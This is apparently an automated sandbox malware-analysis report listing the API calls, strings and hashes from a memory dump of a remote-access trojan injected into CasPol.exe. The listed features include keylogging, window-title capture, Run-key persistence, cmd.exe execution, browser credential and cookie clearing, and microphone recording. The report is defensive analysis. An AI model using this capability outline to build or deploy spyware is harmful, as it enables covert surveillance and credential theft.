• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
• Opcode ID: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
• Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
• Opcode Fuzzy Hash: 0185d7c11a47f4d1cc67a4ecd2b8329abf3b52d4ddc89e50534bed34fd3ab50c
• Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB

APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• CreateThread.KERNEL32(00000000,00000000,00409993,?,00000000,00000000), ref: 0040A691
• CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 0040A69D
• CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTime$wsprintf
• String ID: Online Keylogger Started
• API String ID: 112202259-1258561607
• Opcode ID: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
• Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
• Opcode Fuzzy Hash: 0ab913a718ddbccfb03f45b8536d2eca94befdef1450a1bc42c59ede1cf71113
• Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB

APIs
• CloseHandle.KERNEL32(00000000), ref: 0044AAC9
• GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
• __dosmaperr.LIBCMT ref: 0044AAFE
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID: `@
• API String ID: 2583163307-951712118
• Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
• Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
• Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
• Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F

APIs
• GetLocalTime.KERNEL32(?), ref: 00404946
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
• CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 0040495C
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Create$EventLocalThreadTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 2532271599-1507639952
• Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
• Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
• Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
• Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA

APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
• CloseHandle.KERNEL32(?), ref: 00404B98
• SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
• Opcode ID: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
• Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
• Opcode Fuzzy Hash: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
• Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A

APIs
• RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
• RegSetValueExW.ADVAPI32 ref: 004127AD
• RegCloseKey.ADVAPI32(?), ref: 004127B8
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 1818849710-1051519024
• Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
• Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
• Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
• Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
• Opcode ID: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
• Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
• Opcode Fuzzy Hash: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
• Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C

APIs
• RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
• RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000), ref: 00412709
• RegCloseKey.ADVAPI32(004655B0), ref: 00412714
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: Control Panel\Desktop
• API String ID: 1818849710-27424756
• Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
• Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
• Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
• Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
• RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004), ref: 004127FE
• RegCloseKey.ADVAPI32(?), ref: 00412809
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: TUF
• API String ID: 1818849710-3431404234
• Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
• Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
• Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
• Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
• API String ID: 587946157-3896048727
• Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
• Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
• Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
• Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
• GetProcAddress.KERNEL32(00000000), ref: 00401441
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll
• API String ID: 1646373207-2714051624
APIs
• LoadLibraryA.KERNEL32(User32.dll), ref: 004014DF
• GetProcAddress.KERNEL32(00000000), ref: 004014E6
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992
APIs
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: __alldvrm$_strrchr
• String ID:
• API String ID: 1036877536-0
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
• CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
• CloseHandle.KERNEL32(?), ref: 004047A0
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID:
• API String ID: 3360349984-0
APIs
Strings
• Cleared browsers logins and cookies., xrefs: 0040B8EF
• [Cleared browsers logins and cookies.], xrefs: 0040B8DE
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
APIs
  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32 ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
• Sleep.KERNEL32(00000BB8), ref: 004115C3
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseOpenQuerySleepValue
• String ID: @CG$exepath$BG
• API String ID: 4119054056-3221201242
APIs
  • Part of subcall function 0041B6E6: GetForegroundWindow.USER32 ref: 0041B6F6
  • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
  • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041B729
• Sleep.KERNEL32(000001F4), ref: 00409C95
• Sleep.KERNEL32(00000064), ref: 00409D1F
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
APIs
• CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041B5CE
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
• WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000), ref: 0041B5FF
• CloseHandle.KERNEL32(00000000), ref: 0041B60C
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• String ID:
• API String ID: 3604237281-0
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
  • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
  • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
• _UnwindNestedFrames.LIBCMT ref: 00438124
• __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
• CallCatchBlock.LIBVCRUNTIME ref: 0043815D
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
• String ID:
• API String ID: 737400349-0
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041B633
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B647
                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041B66C
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                                                              • String ID:
                                                                                                              • API String ID: 3919263394-0
                                                                                                              APIs
                                                                                                              • GetSystemMetrics.USER32(0000004C,?,?,?,?,?,004185D2,?,?), ref: 00418519
                                                                                                              • GetSystemMetrics.USER32(0000004D,?,?,?,?,?,004185D2,?,?), ref: 0041851F
                                                                                                              • GetSystemMetrics.USER32(0000004E,?,?,?,?,?,004185D2,?,?), ref: 00418525
                                                                                                              • GetSystemMetrics.USER32(0000004F,?,?,?,?,?,004185D2,?,?), ref: 0041852B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MetricsSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 4116985748-0
                                                                                                              APIs
                                                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B3D3
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B3DB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandleOpenProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 39102293-0
                                                                                                              APIs
                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorHandling__start
                                                                                                              • String ID: pow
                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CountEventTick
                                                                                                              • String ID: >G
                                                                                                              • API String ID: 180926312-1296849874
                                                                                                              APIs
                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ACP$OCP
                                                                                                              • API String ID: 0-711371036
                                                                                                              APIs
                                                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                              Strings
                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocalTime
                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                              • API String ID: 481472006-1507639952
                                                                                                              APIs
                                                                                                              • GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocalTime
                                                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                                                              • API String ID: 481472006-2430845779
                                                                                                              APIs
                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 00419EAE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExistsFilePath
                                                                                                              • String ID: alarm.wav$xIG
                                                                                                              • API String ID: 1174141254-4080756945
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                              • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                              • String ID: Online Keylogger Stopped
                                                                                                              • API String ID: 1623830855-1496645233
                                                                                                              APIs
                                                                                                              • waveInPrepareHeader.WINMM(?,00000020,?), ref: 00401747
                                                                                                              • waveInAddBuffer.WINMM(?,00000020), ref: 0040175D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: wave$BufferHeaderPrepare
                                                                                                              • String ID: T=G
                                                                                                              • API String ID: 2315374483-379896819
APIs
• IsValidLocale.KERNEL32(00000000,j=D,00000000,00000001,?,?,00443D6A,?,?,?,?,00000004), ref: 004477DC
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: LocaleValid
• String ID: IsValidLocaleName$j=D
• API String ID: 1901932003-3128777819
APIs
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: T=G$T=G
• API String ID: 3519838083-3732185208
APIs
• GetKeyState.USER32(00000011), ref: 0040AD5B
  • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
  • Part of subcall function 00409B10: GetKeyboardLayout.USER32 ref: 00409B52
  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
  • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
  • Part of subcall function 00409B10: ToUnicodeEx.USER32 ref: 00409B8A
  • Part of subcall function 00409B10: ToUnicodeEx.USER32 ref: 00409BE3
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• API String ID: 2738857842-2658077756
APIs
• _free.LIBCMT ref: 00448825
  • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorFreeHeapLast_free
• String ID: `@$`@
• API String ID: 1353095263-20545824
APIs
• GetKeyState.USER32(00000012), ref: 0040ADB5
Strings
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• API String ID: 1649606143-2446555240
APIs
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: DeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
• API String ID: 2654517830-1051519024
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
• GetLastError.KERNEL32 ref: 0043FB02
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0